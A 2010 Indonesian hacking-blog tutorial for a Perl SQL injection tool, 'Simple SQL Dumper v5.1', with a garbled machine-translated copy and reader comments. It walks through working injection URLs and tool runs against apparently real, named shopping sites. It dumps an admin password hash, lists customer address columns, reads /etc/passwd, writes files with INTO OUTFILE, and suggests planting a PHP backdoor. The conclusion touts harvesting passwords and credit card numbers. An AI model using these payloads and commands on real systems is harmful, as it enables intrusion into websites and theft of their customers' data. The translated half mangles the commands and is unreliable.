Simple SQL Dumper V.5.1
15 August 2010
Penulis: BinusHacker · Kategori Artikel: Tutorial
[o] attention
USE THIS TOOL FOR EDUCATION PURPOSE ONLY.
WE ARE NOT RESPONSIBLE OF ANY DAMAGE AND IMPROPERLY USE OF THIS TOOL.
USE IT AT YOUR OWN RISK!!
[o] what is SSDp?
SSDp is an usefull penetration tool to find bugs, errors or vulnerabilities in MySQL database.
[o] download SSDp v5.1
http://okedeh.co.tv/ssdp51.tar.gz
http://pacenoge.org/tool/ssdp51.tar.gz
[o] function
- SQL Injection
- Operation System Function
- Dump Database
- Extract Database Schema
- Search Columns Name
- Read File (read only)
- Create File (read only)
- Brute Table & Column
[o] command and option
[root@evilc0de noge]# perl ssdp.pl -h
|—————————————————————————–|
| Usage: perl ssdp.pl [options] |
| |
| -u [SQLi URL] target with id parameter or sqli url with c0li string |
| -e [sqli end tag] sql injection end tag (default: “–”) |
| -d [database name] this option should not be used (default: @@database) |
| -t [table name] table_name |
| -c [columns name] column_name (example: id,user,pass,email) |
| -s [space code] SPACE code: +,/**/,%20 (default: “+”) |
| -f [max field] max field to get magic number (default: 123) |
| -start [num] row number to begin dumping data |
| -stop [num] row number to stop dumping |
| -where [query] your special dumping query |
| |
| -info Get MySQL Information [MySQL v4+] |
| -dbase Concat Databases [MySQL v5+] |
| -table Concat Tables [MySQL v5+] |
| -column Concat Columns [MySQL v5+] |
| -tabcol Concat Tables with Columns [MySQL v5+] |
| -find Search Columns Name [MySQL v5+] |
| -magic Find Magic Number [MySQL v4+] |
| -dump Dump Data [MySQL v4+] |
| -brute Fuzzing Tables & Columns [MySQL v4+] |
| |
| -log [file name] file name to save ssdp data (default: ssdp.log) |
| -p [http proxy] hostname:port |
|—————————————————————————–|
[o] proof of concept
[0x01] magic number (null column).
first of all we have to find null column (magic number).
null column used for execute our SQL query.
# perl ssdp.pl -u [target URL] -magic
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2 -magic
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] URL: http://www.460productions.com/store.php?cat=2
[+] End Tag: –
Attempting to find the magic number…
[+] Testing: 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,
[+] Field Length : 24
[+] Magic Number : 1
[+] URL Injection: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
Showing MySQL Information …
[+] Database: 460store
[+] User: i460usr@boscgi1002.eigbox.net
[+] Version: 5.0.51a-log
[+] System: redhat-linux-gnu
[+] Access to “mysql” Database: No
[+] Read File “/etc/passwd”: Yes (w00t)
[+] Create File “/tmp/c0li-430.txt”: Yes (w00t)
Done.
our magic number is 1 and it will replace with “c0li” string.
we can see the database information and operation system too.
[0x02] finding table
now we use URL that include “c0li” string on it to find table & column.
# perl ssdp.pl -u [c0li URL] -table
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -table
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: –
[+] Database Name: database()
[+] Number of Tables: 18
Showing tables …
[1] aspect_ratio(2)
[2] audio_format(3)
[3] category(7)
[4] customer(200)
[5] deposit(11)
[6] discount_group(9)
[7] discount_group_price(10)
[8] order()
[9] order_item(261)
[10] order_source(5)
[11] order_status(4)
[12] order_type(2)
[13] payment_type(4)
[14] product(30)
[15] product_group(17)
[16] security(1)
[17] shopping_cart(0)
[18] user_session(68)
Done.
that is the list of all table in database()
[0x03] finding column
let’s see column from table called “security”.
# perl ssdp.pl -u [c0li URL] -t [table] -column
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -column
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: –
[+] Database Name: database()
[+] Table Name: security
[+] Number of Columns: 5
Showing columns from table “security” …
[+] security(1): user_id,username,password,admin,last_login
Done.
aha! we got column called “username” and “password”.
[0x04] dumping data
now we’ll see information inside that column.. 
# perl ssdp.pl -u [c0li URL] -t [table] -c [column],[column] -dump
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -c username,password -dump
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: –
[+] Database Name: database()
[+] Table Name: security
[+] Column Name: username,password
[+] Data Count: 1
Dumping Data …
[1] admin : 2ec20101734c754d
Done.
we got admin username and password hash. 
ok i have show you how to find magic number, table, column and dump data the column using SSDp.
[0x05] search column name (-find)
now i’ll show you how to use -find option (Search Columns Name)
i’ll try to search column with keyword “address” it require -c option (column)
# perl ssdp.pl -u [c0li URL] -d [database name] -c [keyword] -find
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -d 460store -c address -find
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: –
[+] Database Name: 460store
[+] Column Name string to search: address
Searching for Columns Path …
[+] Columns Found:
[1] 460store.customer.email_address
[2] 460store.customer.address_line1
[3] 460store.customer.address_line2
[4] 460store.customer.address_city
[5] 460store.customer.address_state
[6] 460store.customer.address_zip
[7] 460store.customer.address_country
[8] 460store.customer.address_name
Done.
found column with word “address” on table “customer”. easy right? :p
[0x06] read & create file (read only)
now let’s see Read File (read only) & Create File (read only).
why read only? coz this function design just to test if we can read file or no. to inject, we do it manually.. 
as you can see at the first time we find magic number you’ll find this line.
[+] Read File “/etc/passwd” : Yes (w00t)
[+] Create File “/tmp/c0li-159.txt” : Yes (w00t)
it means we can read (load_file) the /etc/passwd file on a target also we can create file at /tmp directory.
to use load_file you need to convert the /etc/passwd into hexadecimal. http://pacenoge.org/encdec
http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f6574632f706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24–
the result will be like this.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
let’s create some file in /tmp directory.
http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,”Simple SQLi Dumper”,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+into+outfile+”/tmp/ssdp.txt”–
URL above means we write “Simple SQLi Dumper” into ssdp.txt that locate at /tmp directory.
to see if it works or no lets read /tmp/ssdp.txt using load_file function. don’t forget to convert it first.
http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f746d702f737364702e747874),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24–
and you will see result like this.
1 2 3 4 5 6 Simple SQLi Dumper 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
that the word we write in /tmp/ssdp.txt.
what can we do with create file vuln? we can make a php file as backdoor at the target if we know the directory path. )
[0x07] brute MySQL v4
guessing table & column for MySQL v4.
you can add your own table name & column name by editing file called tables.dict & columns.dict.
# perl ssdp.pl -u [c0li URL] -brute
[root@evilc0de noge]# perl ssdp.pl -u http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33 -brute
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sun Mar 21 19:31:42 2010
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33
[+] SQLi End Tag: –
Finding Tables & Columns …
[1] admin_user: username,password,email,adminid,adminname,phone,
Done.
found table “admin_user”
found column “username” “password” “email” “adminid” “adminname” “phone”
[0x08] conclusion
by using SSDp, it’s very easy to find SQL injection vulnerability at certain vulnerable parameter or string.
this tool also perform SQL injection test to the vulnerable website and try to dump data from MySQL database.
you can dump data from MySQL database columns and it works nicely.
you can gather secret and confidential data such as usernames, passwords, credit card numbers and etc.
but, i suggest using this tool in a right way. okey dude?? :p
[0x09] references
perl ssdp.pl -h
http://en.wikipedia.org/wiki/SQL_injection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
[0x10] greetz ^^
SSDp coded by Vrs-hCk ( ander[at]antisecurity[dot]org )
SSDp How To by NoGe ( mario[at]antisecurity[dot]org )
Vrs-hCk OoN_Boy paman zxvf angel stardustmemory
s4va xr00tb0y S3T4N pizzyroot matthews martfella
Setelah Membaca, Ayo Berbagi:
Recommend on Facebook- Tweet about it
- Buzz it up
- Bookmark in Browser
- Tell a friend
ebat gannn
gan,mw tanya..klo pake sql dumper v.5.1 sama pake schemafuzz ..kira2 yang lebih jitu yang mana ya?
gimana nih??
bingung!!
wew…
)
sampe disini juja tutor na yakz.. xixixixi..
[...] From : Binus Hacker Original Source : Simple SQL Dumper V.5.1 This entry was posted in Computer, Hacking. Bookmark the permalink. ← Hack Photo Private [...]
o] perhatian
GUNAKAN ALAT INI HANYA UNTUK TUJUAN PENDIDIKAN.
KAMI TIDAK BERTANGGUNG JAWAB DAN SEGALA KERUSAKAN benar PENGGUNAAN ALAT INI.
USE IT AT RISIKO ANDA SENDIRI!
[O] apa SSDp?
SSDp adalah alat penetrasi berguna untuk mencari bug, kesalahan atau kerentanan dalam database MySQL.
[O] download SSDp v5.1
http://okedeh.co.tv/ssdp51.tar.gz
http://pacenoge.org/tool/ssdp51.tar.gz
[O] fungsi
- SQL Injection
- Sistem Operasi Fungsi
- Dump Database
- Ekstrak Skema Database
- Search Kolom Nama
- Baca File (baca saja)
- Membuat File (baca saja)
- Tabel Brute & Kolom
[O] perintah dan opsi
[Root @ evilc0de Noge] # perl ssdp.pl-h
|————————–|
| Usage: [pilihan] perl ssdp.pl |
| |
|-U [SQLi URL] target dengan parameter id atau url sqli dengan string c0li |
|-E [end sqli tag] tag akhir injeksi sql (default: “-”) |
|-D [nama database] opsi ini tidak boleh digunakan (default: @ @ database) |
|-T [nama tabel] nama_tabel |
|-C [nama kolom] nama_kolom (contoh: id, user, pass, email) |
|-S [spasi code] kode SPACE: +,/**/,% 20 (default: “+”) |
|-F [maks bidang] lapangan maks untuk mendapatkan nomor ajaib (default: 123) |
|-Start [num] nomor baris untuk mulai data dumping |
|-Stop [num] nomor baris untuk menghentikan dumping |
|-Mana [query] query khusus dumping Anda |
| |
|-Info MySQL Dapatkan Informasi [MySQL v4 +] |
|-DBASE concat Database [MySQL v5 +] |
| Tabel-tabel concat [MySQL v5 +] |
| Concat Kolom-kolom [MySQL v5 +] |
|-Tabcol concat Tabel dengan Kolom [MySQL v5 +] |
|-Menemukan Pencarian Kolom Nama [MySQL v5 +] |
|-Sihir Cari Magic Nomor [MySQL v4 +] |
|-Dump Dump Data [MySQL v4 +] |
|-Tabel Fuzzing kasar & Kolom [MySQL v4 +] |
| |
|-Log [nama file] nama file untuk menyimpan data ssdp (default: ssdp.log) |
|-P [http proxy] hostname: port |
|————————–|
[O] bukti dari konsep
[0x01] angka ajaib (kolom null).
pertama-tama kita harus menemukan kolom null (angka ajaib).
null kolom yang digunakan untuk mengeksekusi query SQL kita.
# Perl ssdp.pl-u [target URL]-sihir
[Root @ evilc0de Noge] # ssdp.pl u-perl http://www.460productions.com/store.php?cat=2-sihir
[O ]=============================================== == [x]
| Wikipedia SQLi Dumper v5.1 |
| Kode oleh VRS-hCk |
[O ]=============================================== == [o]
Bantuan Command:-h,-help,-help
[+] URL: http://www.460productions.com/store.php?cat=2
[+] End Tag: -
Mencoba untuk menemukan angka ajaib …
[+] Pengujian: 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 , 24,
[+] Bidang Durasi: 24
Nomor [+] Magic: 1
[+] URL Injeksi: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li, 2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
Menampilkan Informasi MySQL …
[+] Database: 460store
[+] Pengguna: i460usr@boscgi1002.eigbox.net
[+] Version: 5.0.51a-log
[+] Sistem: redhat-linux-gnu
[+] Akses ke “mysql” Database: Tidak ada
[+] Baca File “/ etc / passwd”: Ya (w00t)
[+] Buat File “/ tmp/c0li-430.txt”: Ya (w00t)
Selesai.
angka ajaib kita adalah 1 dan akan mengganti dengan string “c0li”.
kita dapat melihat informasi database dan sistem operasi juga.
[0x02] menemukan meja
sekarang kita menggunakan URL yang menyertakan “c0li” string di atasnya untuk menemukan tabel & kolom.
# Perl ssdp.pl-u [URL c0li]-tabel
[Root @ evilc0de Noge] # perl-u ssdp.pl http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li, 2,3,4 , 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-meja
[O ]=============================================== == [x]
| Wikipedia SQLi Dumper v5.1 |
| Kode oleh VRS-hCk |
[O ]=============================================== == [o]
Bantuan Command:-h,-help,-help
[+] C0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li, 2,3,4,5,6,7 , 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: -
[+] Database Nama: database ()
[+] Jumlah Tabel: 18
Menampilkan tabel …
[1] aspect_ratio (2)
[2] audio_format (3)
[3] kategori (7)
[4] pelanggan (200)
[5] deposit (11)
[6] discount_group (9)
[7] discount_group_price (10)
[8] order ()
[9] order_item (261)
[10] order_source (5)
[11] order_status (4)
[12] order_type (2)
[13] payment_type (4)
[14] produk (30)
[15] product_group (17)
[16] keamanan (1)
[17] shopping_cart (0)
[18] user_session (68)
Selesai.
yang merupakan daftar semua tabel dalam database ()
[0x03] menemukan kolom
mari kita lihat kolom dari tabel yang disebut “keamanan”.
# Perl ssdp.pl-u [URL c0li]-t [table]-kolom
[Root @ evilc0de Noge] # perl-u ssdp.pl http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li, 2,3,4 , 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-t keamanan-kolom
[O ]=============================================== == [x]
| Wikipedia SQLi Dumper v5.1 |
| Kode oleh VRS-hCk |
[O ]=============================================== == [o]
Bantuan Command:-h,-help,-help
[+] C0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li, 2,3,4,5,6,7 , 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: -
[+] Database Nama: database ()
[+] Tabel Nama: keamanan
[+] Jumlah Kolom: 5
Menampilkan kolom dari tabel “keamanan” …
[+] Keamanan (1): user_id, username, password, admin, last_login
Selesai.
aha! kita punya kolom bernama “username” dan “password”.
[0x04] data dumping
sekarang kita akan melihat informasi dalam kolom itu ..
# Perl ssdp.pl-u [URL c0li]-t [table]-c [kolom], [kolom]-dump
[Root @ evilc0de Noge] # perl-u ssdp.pl http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li, 2,3,4 , 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-t-c keamanan username, password-dump
[O ]=============================================== == [x]
| Wikipedia SQLi Dumper v5.1 |
| Kode oleh VRS-hCk |
[O ]=============================================== == [o]
Bantuan Command:-h,-help,-help
[+] C0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li, 2,3,4,5,6,7 , 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: -
[+] Database Nama: database ()
[+] Tabel Nama: keamanan
[+] Kolom Nama: username, password
[+] Data Count: 1
Dumping data …
[1] admin: 2ec20101734c754d
Selesai.
kita punya username admin dan password hash.
ok saya telah menunjukkan cara untuk menemukan nomor ajaib, tabel, kolom dan data dump kolom menggunakan SSDp.
[0x05] pencarian nama kolom (-cari)
sekarang saya akan menunjukkan kepada Anda bagaimana menggunakan-menemukan pilihan (Search Nama Kolom)
Saya akan mencoba untuk kolom search dengan kata kunci “alamat” itu memerlukan opsi-c (kolom)
# Perl ssdp.pl-u [URL c0li]-d [nama database]-c [kata kunci]-menemukan
[Root @ evilc0de Noge] # perl-u ssdp.pl http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li, 2,3,4 , 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-d-c 460store menemukan alamat-
[O ]=============================================== == [x]
| Wikipedia SQLi Dumper v5.1 |
| Kode oleh VRS-hCk |
[O ]=============================================== == [o]
Bantuan Command:-h,-help,-help
[+] C0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li, 2,3,4,5,6,7 , 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: -
[+] Database Nama: 460store
[+] Kolom Nama string untuk mencari Alamat
Mencari Path Kolom …
[+] Kolom Found:
[1] 460store.customer.email_address
[2] 460store.customer.address_line1
[3] 460store.customer.address_line2
[4] 460store.customer.address_city
[5] 460store.customer.address_state
[6] 460store.customer.address_zip
[7] 460store.customer.address_country
[8] 460store.customer.address_name
Selesai.
menemukan kolom dengan kata “alamat” pada tabel “pelanggan”. mudah kan? : P
[0x06] membaca & membuat file (baca saja)
sekarang mari kita lihat Dibaca Berkas (baca saja) & Buat File (baca saja).
kenapa read only? coz desain ini berfungsi hanya untuk menguji apakah kita bisa membaca file atau tidak. untuk menyuntikkan, kita melakukannya secara manual ..
seperti yang Anda lihat pada saat pertama kali kita menemukan angka ajaib Anda akan menemukan baris ini.
[+] Baca File “/ etc / passwd”: Ya (w00t)
[+] Buat File “/ tmp/c0li-159.txt”: Ya (w00t)
itu berarti kita dapat membaca (load_file) / etc / passwd file target juga kita dapat membuat file di / tmp direktori.
untuk menggunakan load_file Anda perlu mengkonversi / etc / passwd ke heksadesimal. http://pacenoge.org/encdec
http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1, 2,3,4,5,6, load_file (0x2f6574632f706173737764), 8,9 , 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -
hasilnya akan seperti ini.
root: x: 0:0: root: / root: / bin / bash
daemon: x: 1:1: daemon: / usr / sbin: / bin / sh
bin: x: 02:02: bin: / bin: / bin / sh
sys: x: 03:03: sys: / dev: / bin / sh
sync: x: 4:65534: sync: / bin: / bin / sync
games: x: 5:60: games: / usr / games: / bin / sh
manusia: x: 6:12: man: / var / cache / man: / bin / sh
mari kita membuat beberapa file / direktori tmp.
http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1, 2,3,4,5,6, “Wikipedia SQLi Dumper”, 8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 + ke + outfile + “/ ssdp.txt tmp /” -
URL di atas berarti kita menulis “Wikipedia SQLi Dumper” ke ssdp.txt yang terletak pada direktori / tmp.
untuk melihat apakah ia bekerja atau tidak ada mari kita baca / tmp / ssdp.txt menggunakan fungsi load_file. jangan lupa untuk mengubahnya terlebih dahulu.
http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1, 2,3,4,5,6, load_file (0x2f746d702f737364702e747874), 8,9 , 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -
dan Anda akan melihat hasil seperti ini.
1 2 3 4 5 6 Wikipedia SQLi Dumper 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
bahwa kata kita tulis di / tmp / ssdp.txt.
apa yang bisa kita lakukan dengan membuat file vuln? kita bisa membuat file php sebagai backdoor di target jika kita tahu jalur direktori. )
[0x07 seperti] kasar MySQL v4
menebak tabel & kolom untuk MySQL v4.
Anda dapat menambahkan meja Anda sendiri nama & nama kolom dengan mengedit file bernama tables.dict & columns.dict.
# Perl ssdp.pl-u [URL c0li]-kasar
[Root @ evilc0de Noge] # perl-u ssdp.pl http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1, 2,3,4 , 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 , 30,31, c0li, 33-kasar
[O ]=============================================== == [x]
| Wikipedia SQLi Dumper v5.1 |
| Kode oleh VRS-hCk |
[O ]=============================================== == [o]
Tanggal: Sun 21 Mar 2010 19:31:42
Bantuan Command:-h,-help,-help
[+] C0li SQLi URL: http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1, 2,3,4,5,6,7 , 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, c0li , 33
[+] SQLi End Tag: -
Menemukan Tabel & Kolom …
[1] admin_user: username, password, email, adminid, adminname, telepon,
Selesai.
ditemukan tabel “admin_user”
menemukan kolom “username” “password” “email” “adminid” “adminname” “telepon”
[0x08] kesimpulan
dengan menggunakan SSDp, sangat mudah untuk menemukan kerentanan SQL injection pada parameter rentan tertentu atau string.
alat ini juga melakukan uji injeksi SQL ke situs rentan dan mencoba untuk dump data dari database MySQL.
Anda bisa dump data dari kolom database MySQL dan bekerja dengan baik.
Anda dapat mengumpulkan data rahasia dan rahasia seperti username, password nomor kredit, kartu dan lain-lain
namun, saya sarankan menggunakan alat ini secara benar. okey dude? : P
[0x09] referensi
perl ssdp.pl-h
http://en.wikipedia.org/wiki/SQL_injection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
[0x10] greetz ^ ^
SSDp kode oleh VRS-hCk (ander [at] antisecurity [dot] org)
SSDp Cara oleh Noge (mario [at] antisecurity [dot] org)
VRS-hCk OoN_Boy Paman zxvf malaikat stardustmemory
s4va xr00tb0y S3T4N pizzyroot Matthews martfella
ne yg terjemahin google lho ya.. hihihihihi…
koq bs error kek gini gan …..
[entah@sec ssdp51]$ perl ssdp.pl -h
Can’t locate HTTP/Request.pm in @INC (@INC contains: /usr/local/lib/perl5 /usr/local/share/perl5 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl5 /usr/share/perl5 /usr/local/lib/perl5/site_perl/5.10.0/i386-linux-thread-multi /usr/local/lib/perl5/site_perl/5.10.0 /usr/lib/perl5/vendor_perl/5.10.0/i386-linux-thread-multi /usr/lib/perl5/vendor_perl /usr/lib/perl5/site_perl .) at ssdp.pl line 12.
BEGIN failed–compilation aborted at ssdp.pl line 12.
bingung nee…
mohon pencerahan nya